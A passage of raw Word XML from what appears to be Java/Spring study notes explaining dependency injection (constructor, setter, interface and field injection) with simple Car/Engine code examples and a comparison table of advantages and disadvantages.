          <w:szCs w:val="22"/>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Dependency Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F5C74"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w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Dependencies are provided through the constructor of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAAAB0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class constructor receives the required dependencies as parameters, ensuring that the class cannot function without these dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7770F48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is often preferred because it makes dependencies explicit and ensures that they are available when the object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362B57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D873F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E5AD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3D5752" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004BC68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onstructor Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760ACA9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170A84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0995B06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E9DF40D" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA8883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87F6D1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1B89F36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64AEE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3ABFCDD"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w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Dependencies are provided through setter methods after the object has been created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081080C2"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allows for optional dependencies and can be useful when you want to change the dependencies at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28371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DD74CE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37AEB71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B33138" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297403D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etter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C4286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public void setEngine(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F7E7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6B477A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45EE6E9" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CD36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6BAA09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60AED0B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88CD0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2D4367"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face Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The class implements an interface that provides a method for injecting the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FAE6C"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less common in practice compared to constructor or setter injection but can be useful in certain scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48531D3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794480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interface EngineAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C233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oid setEngine(Engine engine);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FFB35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2A8F2F6D" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521B2BE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implements EngineAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F5B4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060DE5BA" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E32BAC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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3362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5D460BD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634196B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63EDEBD" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F3DB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6A40DA4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550233E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08EE10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145C239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dvantages of Dependency Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDFB00"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se Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DI reduces the coupling between objects, as they do not need to know how to create their dependencies. They only need to know what dependencies are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5222E9BE"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sier Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since dependencies are injected, it becomes easier to provide mock implementations during testing, improving unit testing and making the code more testable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E0773"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de Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Objects can be reused without worrying about their dependencies, as they can be provided externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3820900F"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lexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The system becomes more flexible to changes, as you can change the implementation of a dependency without modifying the dependent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54435BA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in Spring Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371FE51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w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, dependency injection is one of the key features, and it's typically done using annotations or XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA491E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 in Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D152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2A0ECF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42AF358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final Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5D45C" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D0B67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0BF50C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52F74F4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4A971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363994E" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFD103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D62ECE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2726861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BF256E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6AFD9BA2" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E48986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20A84E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public class Engine {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899463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run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B27A3F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Engine is running!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC926F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1E8F0C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06ADA4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 Spring will automatically inject the Engine bean into the Car bean through constructor injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E451F5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 in Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD08AB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765C80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B8581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79183B20" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A133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1040F57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271497E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5C14B7C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1DA7FD2" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566655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EF6BA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4A65FA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54758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D1A8D6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5EAF61A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20" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB0C6FF" w14:textId="687BF494" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="002F649D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="_Toc197867673"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the different ways of injection</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
    <w:p w14:paraId="79E7BD44" w14:textId="6F31B457" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>three primary types of Dependency Injection (DI)</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These methods differ in how the dependencies are provided to the class that requires them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54E465"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onstructor Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CAD8E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4A4D0369"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required at the time of object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788A4F8"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sures that the object is always in a valid state with all required dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D7F0F"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ferred method as it makes the dependencies explicit and immutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C70287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5CBF6D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CC8E7F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final Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02773351" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F85C5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onstructor Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFADB4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Car(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC39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50F86D2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803B1F" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0368F8D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6D1E3A9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3BBBD7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4CFF1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4E375B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requires an Engine object. The dependency is injected via the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526DAB1"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etter Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA0BED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4DCCFF1"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can be set or modified after the object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46221F3A"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Not ideal for mandatory dependencies since the object can be created without its dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614C345"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for optional dependencies or when the dependencies might change over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059407A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AF7815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2429CC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91B285" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7A94F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Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2DE1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07FE0D7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385664A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60CBEF" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7C8B8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E01B5F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62AEFBE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E03B79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FA63B4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allows the Engine object to be injected through the setter method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC12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Interface Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB9F8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face Injection is a less common form of dependency injection, where the dependent class must implement an interface that exposes a method for injecting the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB4097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7BDCB528"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dependent class must implement an interface that provides a method to inject the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1EC670"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method is more flexible but less commonly used in frameworks like Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFA58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D6D388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ngineAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D834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void setEngine(Engine engine);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11414AA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0D8B930" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654530D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implements EngineAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F901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14F83A25" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DB6B3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29AD0B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6EA4C40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42005F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3573626" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C50E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19CDBF4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0530BDE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9F1DAA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E5CFD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implements the EngineAware interface and provides a method to set the Engine dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A5589"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Field Injection (Specific to frameworks like Spring):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A60319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Field Injection is another form of DI, particularly popular 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where dependencies are injected directly into the fields (variables) of a class, typically using annotations such as @Autowired in Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475BA9B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28A202E"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injected directly into the fields of the class, often without using setters or constructors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28014A9F"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useful for simplicity but might make the code harder to test and maintain due to lack of explicit constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54987B4B"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ypically used in Spring or other frameworks that support DI through annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BEDBA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 in Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDE66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437D72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EAA442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2505FEB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0964D4" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6E1B9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42646F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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7CCE4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E02C9F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C0A135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Engine dependency is injected directly into the Car class field via the @Autowired annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7993F26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2817"/>
        <w:gridCol w:w="2836"/>
        <w:gridCol w:w="3221"/>
      </w:tblGrid>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="67EBED7A" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BC81DEF"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jection Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="073127AE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03CBE720"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Advantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="406E70D8"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Disadvantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="499E12AF" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6102477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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F7BD0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mandatory and should be immutable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BF51B2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Ensures that dependencies are provided at creation time. - Makes dependencies explicit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="451ECCA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not change dependencies after object creation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="62A78DA9" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="503FB29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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36B43895"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optional or can be changed during the object's lifecycle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AEB76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ore flexible than constructor injection. - Allows for modification of dependencies at any time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7620C80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 lead to incomplete objects if not all dependencies are set.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="40EFF1B7" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F27E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01F7B30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decouple dependency injection logic from the class, but this is less common.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169CCA2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Allows for greater flexibility and separation of concerns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1802DD4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Less commonly used and can lead to complex code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="5302182F" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
